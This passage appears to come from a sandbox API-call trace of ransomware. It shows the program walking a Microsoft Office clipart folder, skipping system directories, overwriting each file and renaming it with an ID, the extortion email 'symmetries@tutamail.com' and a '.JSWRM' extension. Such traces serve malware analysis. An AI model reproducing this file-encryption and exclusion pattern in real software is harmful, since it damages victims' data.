Flags=0x0, Size=0x1750) returned 0x205850 [0095.315] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1750, lpOverlapped=0x0) returned 1 [0095.340] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.340] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1750, lpOverlapped=0x0) returned 1 [0095.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.340] CloseHandle (hObject=0x314) returned 1 [0095.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0095.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0095.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0095.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0095.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0095.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.340] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\road_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\road_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0095.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0095.341] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x278a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SAFRI_01.MID", cAlternateFileName="")) returned 1 [0095.341] lstrcmpiW (lpString1="SAFRI_01.MID", lpString2=".") returned 1 [0095.341] lstrcmpiW (lpString1="SAFRI_01.MID", lpString2="..") returned 1 [0095.341] lstrcmpiW (lpString1="SAFRI_01.MID", lpString2="...") returned 1 [0095.341] lstrcmpiW (lpString1="SAFRI_01.MID", lpString2="windows") returned -1 [0095.341] lstrcmpiW (lpString1="SAFRI_01.MID", lpString2="recovery") returned 1 [0095.341] lstrcmpiW (lpString1="SAFRI_01.MID", lpString2="perflogs") returned 1 [0095.342] lstrcmpiW (lpString1="SAFRI_01.MID", lpString2="documents and settings") returned 1 [0095.342] lstrcmpiW (lpString1="SAFRI_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0095.342] lstrcmpiW (lpString1="SAFRI_01.MID", lpString2="system volume information") returned -1 [0095.342] lstrcmpiW (lpString1="SAFRI_01.MID", lpString2="msocache") returned 1 [0095.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0095.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAFRI_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAFRI_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAFRI_01.MID", lpUsedDefaultChar=0x0) returned 12 [0095.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0095.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0095.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAFRI_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAFRI_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAFRI_01.MID", lpUsedDefaultChar=0x0) returned 12 [0095.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0095.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0095.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0095.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.342] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10122) returned 1 [0095.343] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2780) returned 0x24d210 [0095.343] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2780, lpOverlapped=0x0) returned 1 [0095.345] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.345] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2780, lpOverlapped=0x0) returned 1 [0095.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.346] CloseHandle (hObject=0x314) returned 1 [0095.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0095.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0095.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0095.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0095.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0095.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.346] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0095.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0095.347] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13c2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SCHOL_02.MID", cAlternateFileName="")) returned 1 [0095.347] lstrcmpiW (lpString1="SCHOL_02.MID", lpString2=".") returned 1 [0095.347] lstrcmpiW (lpString1="SCHOL_02.MID", lpString2="..") returned 1 [0095.347] lstrcmpiW (lpString1="SCHOL_02.MID", lpString2="...") returned 1 [0095.347] lstrcmpiW (lpString1="SCHOL_02.MID", lpString2="windows") returned -1 [0095.347] lstrcmpiW (lpString1="SCHOL_02.MID", lpString2="recovery") returned 1 [0095.347] lstrcmpiW (lpString1="SCHOL_02.MID", lpString2="perflogs") returned 1 [0095.347] lstrcmpiW (lpString1="SCHOL_02.MID", lpString2="documents and settings") returned 1 [0095.347] lstrcmpiW (lpString1="SCHOL_02.MID", lpString2="$RECYCLE.BIN") returned 1 [0095.347] lstrcmpiW (lpString1="SCHOL_02.MID", lpString2="system volume information") returned -1 [0095.347] lstrcmpiW (lpString1="SCHOL_02.MID", lpString2="msocache") returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHOL_02.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHOL_02.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHOL_02.MID", lpUsedDefaultChar=0x0) returned 12 [0095.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0095.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHOL_02.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHOL_02.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHOL_02.MID", lpUsedDefaultChar=0x0) returned 12 [0095.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0095.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0095.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.349] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5058) returned 1 [0095.349] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13c0) returned 0x205850 [0095.349] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x13c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x13c0, lpOverlapped=0x0) returned 1 [0095.350] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.350] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x13c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x13c0, lpOverlapped=0x0) returned 1 [0095.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.350] CloseHandle (hObject=0x314) returned 1 [0095.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0095.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0095.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0095.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0095.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0095.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0095.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.351] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0095.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0095.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.352] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SHOW_01.MID", cAlternateFileName="")) returned 1 [0095.352] lstrcmpiW (lpString1="SHOW_01.MID", lpString2=".") returned 1 [0095.352] lstrcmpiW (lpString1="SHOW_01.MID", lpString2="..") returned 1 [0095.352] lstrcmpiW (lpString1="SHOW_01.MID", lpString2="...") returned 1 [0095.352] lstrcmpiW (lpString1="SHOW_01.MID", lpString2="windows") returned -1 [0095.352] lstrcmpiW (lpString1="SHOW_01.MID", lpString2="recovery") returned 1 [0095.352] lstrcmpiW (lpString1="SHOW_01.MID", lpString2="perflogs") returned 1 [0095.352] lstrcmpiW (lpString1="SHOW_01.MID", lpString2="documents and settings") returned 1 [0095.352] lstrcmpiW (lpString1="SHOW_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0095.352] lstrcmpiW (lpString1="SHOW_01.MID", lpString2="system volume information") returned -1 [0095.352] lstrcmpiW (lpString1="SHOW_01.MID", lpString2="msocache") returned 1 [0095.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0095.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOW_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOW_01.MID", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHOW_01.MID", lpUsedDefaultChar=0x0) returned 11 [0095.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0095.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOW_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOW_01.MID", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHOW_01.MID", lpUsedDefaultChar=0x0) returned 11 [0095.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0095.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.353] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6392) returned 1 [0095.353] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18f0) returned 0x205850 [0095.353] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x18f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x18f0, lpOverlapped=0x0) returned 1 [0095.355] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.355] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x18f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x18f0, lpOverlapped=0x0) returned 1 [0095.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.355] CloseHandle (hObject=0x314) returned 1 [0095.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0095.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0095.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, 